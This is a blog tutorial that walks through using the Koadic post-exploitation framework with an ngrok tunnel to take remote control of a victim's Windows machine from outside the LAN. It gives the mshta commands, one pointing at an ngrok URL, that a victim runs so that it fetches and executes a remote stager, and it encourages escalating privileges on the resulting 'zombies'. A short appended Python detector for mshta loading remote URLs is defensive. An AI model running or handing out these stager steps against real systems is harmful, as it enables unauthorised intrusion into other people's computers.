In the previous post, I explained how to use Metasploit and establish a reverse TCP connection from outside the LAN without port forwarding. Since then, a lot of our readers have asked about using ngrok with Koadic (well, most users around the world are still on Windows, and Koadic is one of the best weapons against it).
What is Koadic?
Koadic is an awesome tool developed by zerosum0x0. It provides remote access to a machine with very little user interaction and has various modules that help us perform enumeration, pivoting, and privilege escalation. The server-side component is written in Python and the client part is written in JavaScript/VBScript.
Koadic is a post-exploitation tool that is more JavaScript oriented than PowerShell oriented. Even though most of the attack vectors are PowerShell based, the JavaScript part is not checked by defense mechanisms. It also uses Microsoft-signed binaries to run its stagers, which is really cool most of the time.
Exploit Windows Outside LAN Using Koadic
In this post, we'll discuss attacking a Windows 7 machine (this also works on other versions, including Windows 10, as of now) using Koadic, to establish a session from a victim's Windows machine to our local machine, without port forwarding.
Step 1 – Download and Setup Koadic
Koadic is available on GitHub. You can easily download and set it up using the commands below.
Use the command ‘info’ for more details
Set the value of SRVHOST (server IP, also used as the connect-back IP), which is the IP address of the attacker's machine, and SRVPORT (port).
Now execute the command 'run'.
You will be provided with a command that is to be run within the command prompt of the victim's machine, as shown in the screenshot.
Step 4 – Testing inside the LAN
Before going outside the LAN, it is always a good idea to test the setup within the LAN. Open the command prompt of the victim's machine and enter the command we got from the previous step.
mshta http://10.9.3.50/UEv5M
If everything is done correctly, a new session will start with the victim's machine as Zombie 0. You can do anything you want with that.
Step 5 – Set Up Ngrok
Now let's go one step further and run Koadic outside the LAN, over the internet. ngrok enables connections to a device, or a service (such as SSH) running on a device, inside a local network or located across the internet, without port forwarding. This lets the victim's Windows device establish a session to our attacking device even when our machine sits inside a private network.
Let us start by installing and setting up ngrok on our Kali machine. To do that, follow Steps 1, 2 and 3 in the tutorial below. You can do a lot more using ngrok.
This means that all HTTP traffic sent to 61af7cd6.ngrok.io on port 80 over the internet will be forwarded by ngrok to port 9999 on our machine. Leave it running.
Step 7 – Testing Koadic Outside LAN
This step is similar to Step 4, but we are going to make a slight change in the URL. This time, we replace the IP address with the domain name of the ngrok URL.
So http://10.9.3.50:9999/UEv5M becomes http://61af7cd6.ngrok.io/UEv5M, and the command will be:
mshta http://61af7cd6.ngrok.io/UEv5M
Run this command on the victim machine.
Tadaaa!! You will get another session as Zombie 1. That's it. Now you can easily escalate privileges and play with your Zombies.
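Because the stager on both the LAN path and the ngrok path is a single mshta invocation pointing at a remote URL, that command line is also what a defender can watch for. The following is an added example, not part of the original post or of Koadic: it scans constructed process-creation log lines (Sysmon Event ID 1 style fields, in an assumed "Key=Value | Key=Value" layout) and flags mshta.exe launched with a remote URL, scoring ngrok tunnel hostnames higher. The log layout, the field names and the tunnel-suffix list are assumptions.

```python
import re
from typing import Optional
from urllib.parse import urlparse

# Built-in Windows binaries that fetch and run remote script content when
# handed a URL on the command line (mshta is the one the post uses).
LOLBIN_FETCHERS = {"mshta.exe"}
# Tunnel-service domain suffixes that expose a server behind NAT without
# port forwarding. Only ngrok.io appears in the post; extend as needed (assumption).
TUNNEL_SUFFIXES = (".ngrok.io",)
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def parse_event(line: str) -> dict:
    """Parse 'Key=Value' pairs separated by ' | ' (constructed log format)."""
    fields = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields

def analyse(line: str) -> Optional[dict]:
    """Return a finding for an mshta launch that loads a remote URL, else None."""
    ev = parse_event(line)
    image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    if image not in LOLBIN_FETCHERS:
        return None
    urls = URL_RE.findall(ev.get("CommandLine", ""))
    if not urls:
        return None  # mshta opening a local .hta file: not what this rule targets
    host = urlparse(urls[0]).hostname or ""
    severity = "high" if host.endswith(TUNNEL_SUFFIXES) else "medium"
    return {"image": image, "url": urls[0], "host": host,
            "parent": ev.get("ParentImage", ""), "severity": severity}

def scan(lines) -> list:
    """Run analyse() over every line and keep only the findings."""
    return [f for f in (analyse(l) for l in lines) if f]

# Constructed sample events; the URLs mirror the ones shown in the post.
SAMPLE_LOG = [
    "Image=C:\\Windows\\System32\\mshta.exe | CommandLine=mshta http://10.9.3.50/UEv5M | ParentImage=C:\\Windows\\System32\\cmd.exe",
    "Image=C:\\Windows\\System32\\mshta.exe | CommandLine=mshta http://61af7cd6.ngrok.io/UEv5M | ParentImage=C:\\Windows\\System32\\cmd.exe",
    "Image=C:\\Windows\\System32\\mshta.exe | CommandLine=mshta.exe C:\\Users\\bob\\app.hta | ParentImage=C:\\Windows\\explorer.exe",
    "Image=C:\\Windows\\System32\\notepad.exe | CommandLine=notepad.exe http://example.org | ParentImage=C:\\Windows\\explorer.exe",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['image']} -> {f['url']} (parent: {f['parent']})")
```

The same URL check also applies to a web proxy log: a request to an ngrok hostname from a host that never uses tunnel services is worth a look even without the process event.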
Disclaimer: This is for educational purposes only. Any actions and/or activities related to the material contained within this website are solely your responsibility. The misuse of the information on this website can result in criminal charges being brought against the persons in question. The authors will not be held responsible in the event any criminal charges are brought against any individuals misusing the information on this website to break the law.